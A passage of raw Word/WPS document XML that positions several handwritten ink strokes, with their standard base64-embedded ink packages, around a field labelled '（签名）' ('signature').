y&#10;b0RvYy54bWwucmVsc4XPsWrEMAwG4L3QdzDaGyUdylHiZDkOspYUbjWOkpjEsrGc0nv7euzBwQ0a&#10;hND3S23/63f1Q0lcYA1NVYMitmFyvGj4Hi9vJ1CSDU9mD0wabiTQd68v7RftJpclWV0UVRQWDWvO&#10;8RNR7EreSBUicZnMIXmTS5sWjMZuZiF8r+sPTP8N6O5MNUwa0jA1oMZbLMnP7TDPztI52MMT5wcR&#10;aA/JwV/9XlCTFsoaHG9YqqnKoYBdi3ePdX9QSwMEFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAABb&#10;Q29udGVudF9UeXBlc10ueG1slZHBTsMwEETvSPyD5StKnPaAEGrSAylHQKh8gGVvEqv22vKa0P49&#10;TtpeEKXi4IO9M29G69V67ywbIZLxWPNFWXEGqLw22Nf8Y/tcPHBGSaKW1iPU/ADE183tzWp7CEAs&#10;u5FqPqQUHoUgNYCTVPoAmCedj06mfI29CFLtZA9iWVX3QnlMgKlIE4M3qxY6+WkT2+zz87FJBEuc&#10;PR2FU1bNZQjWKJlyUzGi/pFSnBLK7Jw1NJhAd7kGF78mTJPLASffa15NNBrYm4zpRbpcQ+hIQvsv&#10;jDCWf0Omlo4K33VGQdlGarPtHcZzq0t0WPrWq//CN7PrGtvgTuSzuELPEmfPLDF/dvMNUEsBAhQA&#10;FAAAAAgAh07iQAMVKdoFAQAALQIAABMAAAAAAAAAAQAgAAAAkAgAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAAABAAAABbBgAAX3JlbHMvUEsB&#10;AhQAFAAAAAgAh07iQIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAAfwYAAF9yZWxzLy5yZWxzUEsB&#10;AhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAAAAAAAGRycy9QSwECFAAKAAAA&#10;AACHTuJAAAAAAAAAAAAAAAAACgAAAAAAAAAAABAAAAB5BwAAZHJzL19yZWxzL1BLAQIUABQAAAAI&#10;AIdO4kB5GLyduAAAACEBAAAZAAAAAAAAAAEAIAAAAKEHAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5y&#10;ZWxzUEsBAhQAFAAAAAgAh07iQHmtYG/YAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kBqcjznnAEAAIoDAAAOAAAAAAAAAAEAIAAAACcBAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAEAAAAO8CAABk&#10;cnMvaW5rL1BLAQIUABQAAAAIAIdO4kBE4pvIGAMAAEUHAAAQAAAAAAAAAAEAIAAAABUDAABkcnMv&#10;aW5rL2luazEueG1sUEsFBgAAAAAKAAoATAIAAMYJAAAAAA==&#10;">
                <v:imagedata r:id="rId46" o:title=""/>
                <o:lock v:ext="edit"/>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5373370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>99695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="27305" cy="396240"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="55" name="墨迹 55"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId47">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="55" name="墨迹 55"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="6059170" y="8146415"/>
                            <a:ext cx="27305" cy="396240"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:423.1pt;margin-top:7.85pt;height:31.2pt;width:2.15pt;z-index:251676672;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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vCAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAA&#10;EAAAAPoFAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAAAAAAAAABACAAAAAe&#10;BgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAAAAAAABAAAAAA&#10;AAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAAABgHAABkcnMv&#10;X3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAgAAAAQAcAAGRycy9f&#10;cmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAB9czmNoAAAAJAQAADwAAAAAAAAAB&#10;ACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQOOmjXaeAQAAigMAAA4AAAAA&#10;AAAAAQAgAAAAKQEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAgA&#10;AAAAAAAAAAAQAAAA8wIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQL289sKzAgAAkQYAABAAAAAA&#10;AAAAAQAgAAAAGQMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAAZQkAAAAA&#10;">
                <v:imagedata r:id="rId48" o:title=""/>
                <o:lock v:ext="edit"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3393440</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>122555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="53975" cy="904875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="墨迹 39"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId49">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="39" name="墨迹 39"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4079240" y="8367395"/>
                            <a:ext cx="53975" cy="904875"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:267.2pt;margin-top:9.65pt;height:71.25pt;width:4.25pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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HkYvJ24&#10;AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQwDAbgvdB3MNobJR3KUeJk&#10;OQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2YXK8aPgeL28nUJINT2YP&#10;TBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaMxm5mIXyv6w9M/w3o7kw1&#10;TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqhgF2Ld491f1BLAwQUAAAA&#10;CACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyVkcFOwzAQRO9I/IPlK0qc&#10;9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBshkvFY80VZcQaovDbY1/xj&#10;+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52PTqZ8jb0IUu1kD2JZVfdC&#10;eUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKcEsrsnDU0mEB3uQYXvyZM&#10;k8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0dxnOrS3RY+tar/8I3s+sa&#10;2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAAAAAAABACAA&#10;AAA1CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAA&#10;AAAAAAAAEAAAAAAGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAAAAAAAAAB&#10;ACAAAAAkBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAAAAAA&#10;ABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAAAB4H&#10;AABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAgAAAARgcA&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAOoO16NkAAAAKAQAADwAA&#10;AAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQDF2CbulAQAAigMA&#10;AA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAA&#10;AAAAAAgAAAAAAAAAAAAQAAAA+QIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQKDFfeyzAgAAbgYA&#10;ABAAAAAAAAAAAQAgAAAAHwMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAAawkAAAAA&#10;">
                <v:imagedata r:id="rId50" o:title=""/>
                <o:lock v:ext="edit"/>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3597910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>146050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="295910" cy="40005"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="43" name="墨迹 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId51">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="43" name="墨迹 43"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4283710" y="8390890"/>
                            <a:ext cx="295910" cy="40005"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:283.3pt;margin-top:11.5pt;height:3.15pt;width:23.3pt;z-index:251664384;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAsN/mCdgAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMAyG70i8Q2QkLhNLurGASt0dmLgggcTYNI5pE9qK&#10;xqmabCtvjznB0fan399frCffi5MbYxcIIZsrEI7qYDtqEHbvTzf3IGIyZE0fyCF8uwjr8vKiMLkN&#10;Z3pzp21qBIdQzA1Cm9KQSxnr1nkT52FwxLfPMHqTeBwbaUdz5nDfy4VSWnrTEX9ozeAeW1d/bY8e&#10;4XUj9cuuaszznU4fm9me1DQ7IF5fZeoBRHJT+oPhV5/VoWSnKhzJRtEjrLTWjCIsltyJAZ3d8qJC&#10;WKoVyLKQ/xuUP1BLAwQUAAAACACHTuJAyUVDmqQBAACJAwAADgAAAGRycy9lMm9Eb2MueG1srVNL&#10;btswEN0X6B0I7mtRv8QWTGdRI0AWSb1oDsBQpEVUJIUhbTnX6apX6KqnKdBjdGTZsZOiQBBkOfMG&#10;b96bR86vdrYlWwXBeMdpOmGUKCd9bdya0/uv15+mlIQoXC1a7xSnjyrQq8XHD/O+q1TmG9/WCgiS&#10;uFD1HadNjF2VJEE2yoow8Z1yCGoPVkQsYZ3UIHpkt22SMXaR9B7qDrxUIWB3OYL0wAivIfRaG6mW&#10;Xm6scnFkBdWKiJZCY7pAF3u1WisZv2gdVCQtp1lZoNnIaZ5elpTgqou8xM4Dp0VRlDRZzEW1BtE1&#10;Rh7kiNfIeeHPCuNQwBPVUkRBNmD+obJGgg9ex4n0NhlN7a+DjlL24k437tvgKi3kBirpXUTnKwHx&#10;mMQeeMsK2+IF+ltfY9ayhXcOgkBlak7hpk5P8t3288nACk627rYrIMN8kVPihEVJv7//+PPrJ8EG&#10;xnO0f/ecAJHkAP2PeqfBDpnglckO+bNpfpli9o+cTvMZm87YGL/aRSJxIJuVswGXOFAwxvav47hk&#10;JDtWZ2Ggjmexn9eDxrMftPgLUEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAZHJzL2luay9Q&#10;SwMEFAAAAAgAh07iQJr7vzi9AgAAkwYAABAAAABkcnMvaW5rL2luazEueG1stVTfa9swEH4f7H8Q&#10;6kMfZiWSLMtxaNqHQWGwQWk72B5dR01M/SPISpP+9/skO05Z08FgS0Cn0919d/fp5IurfV2RZ2O7&#10;sm0WVEw4JaYp2mXZrBb0+/01m1HSubxZ5lXbmAV9MR29uvz44aJsnupqjpUAoen8rq4WdO3cZj6d&#10;7na7yS6etHY1lZzH0y/N07ev9HKIWprHsikdUnaHo6JtnNk7DzYvlwtauD0f/YF9125tYUazP7HF&#10;0cPZvDDXra1zNyKu86YxFWnyGnX/oMS9bLApkWdlLCVbVNAhUU2np0N+/n3I9ZuQOt+DVi7j3xJO&#10;A1/z9+u+se3GWFeaI0V9Q4PhhRS9Hnrrm7Sma6ut55WS57zaol05m8RKq0TrTGYiVmMZYnqi87fY&#10;IOG/YYOt97EnMyV0+qbcgbeh99ckDZZxVg6X6sraYILrzTg8rsOU++M7Z8OcSy4FE5Lx9F7oeRzP&#10;VeKH4pCrH80D3oPddusR68EehzBYRgr71nbl0q3H2+ATLqSWfCazLE15loixwde3cQpobcrV2v0L&#10;pKKtWsz/MCBnPPyOj+BU8sfS3beft/bZjHHizxHlqmmtucFEdlt7jOKveA2JRpZPfBPC4yDDl+HW&#10;PC7oWfgskBDZHwT+VaoTTsREplom5hPXJE1VdM5Udi6Tcx5RRTnlUUw4GVcm/Z7FRPiVyUjhREaS&#10;JcM+DudhJXGkmWAqyogiOhKcxKwXsChYkogHPA48hT0ywVcAT2RE9yKF10EjgsURExqJBWSCgCRI&#10;iSQqgMgETqgnYQJgXoNAmA/AtErkYVJCR6CXqARdAFbO0GYvvJZBgyuifcpg9BFwYilkCjP0BH8d&#10;yZhlngPJ0KLwEm5wAvoMIiEpKvJSwzno8GYCfaJsMAkr6gNDKlTLPDUot2cCmFDhP/PGw+MKdzwO&#10;AR7v5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eRi8nbgAAAAhAQAAGQAAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHOFz7FqxDAMBuC90Hcw&#10;2hslHcpR4mQ5DrKWFG41jpKYxLKxnNJ7+3rswcENGoTQ90tt/+t39UNJXGANTVWDIrZhcrxo+B4v&#10;bydQkg1PZg9MGm4k0HevL+0X7SaXJVldFFUUFg1rzvETUexK3kgVInGZzCF5k0ubFozGbmYhfK/r&#10;D0z/DejuTDVMGtIwNaDGWyzJz+0wz87SOdjDE+cHEWgPycFf/V5QkxbKGhxvWKqpyqGAXYt3j3V/&#10;UEsDBBQAAAAIAIdO4kADFSnaBQEAAC0CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbJWRwU7DMBBE&#10;70j8g+UrSpz2gBBq0gMpR0CofIBlbxKr9trymtD+PU7aXhCl4uCDvTNvRuvVeu8sGyGS8VjzRVlx&#10;Bqi8NtjX/GP7XDxwRkmiltYj1PwAxNfN7c1qewhALLuRaj6kFB6FIDWAk1T6AJgnnY9OpnyNvQhS&#10;7WQPYllV90J5TICpSBODN6sWOvlpE9vs8/OxSQRLnD0dhVNWzWUI1iiZclMxov6RUpwSyuycNTSY&#10;QHe5Bhe/JkyTywEn32teTTQa2JuM6UW6XEPoSEL7L4wwln9DppaOCt91RkHZRmqz7R3Gc6tLdFj6&#10;1qv/wjez6xrb4E7ks7hCzxJnzywxf3bzDVBLAQIUABQAAAAIAIdO4kADFSnaBQEAAC0CAAATAAAA&#10;AAAAAAEAIAAAAD0IAABbQ29udGVudF9UeXBlc10ueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAA&#10;AAAAAAYAAAAAAAAAAAAQAAAACAYAAF9yZWxzL1BLAQIUABQAAAAIAIdO4kCKFGY80QAAAJQBAAAL&#10;AAAAAAAAAAEAIAAAACwGAABfcmVscy8ucmVsc1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAE&#10;AAAAAAAAAAAAEAAAAAAAAABkcnMvUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAoAAAAAAAAA&#10;AAAQAAAAJgcAAGRycy9fcmVscy9QSwECFAAUAAAACACHTuJAeRi8nbgAAAAhAQAAGQAAAAAAAAAB&#10;ACAAAABOBwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLAQIUABQAAAAIAIdO4kCw3+YJ2AAA&#10;AAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAyUVD&#10;mqQBAACJAwAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0RvYy54bWxQSwECFAAKAAAAAACHTuJA&#10;AAAAAAAAAAAAAAAACAAAAAAAAAAAABAAAAD3AgAAZHJzL2luay9QSwECFAAUAAAACACHTuJAmvu/&#10;OL0CAACTBgAAEAAAAAAAAAABACAAAAAdAwAAZHJzL2luay9pbmsxLnhtbFBLBQYAAAAACgAKAEwC&#10;AABzCQAAAAA=&#10;">
                <v:imagedata r:id="rId52" o:title=""/>
                <o:lock v:ext="edit"/>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3534410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>327660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="90170"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="44" name="墨迹 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId53">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="44" name="墨迹 44"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4220210" y="8572500"/>
                            <a:ext cx="342900" cy="90170"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
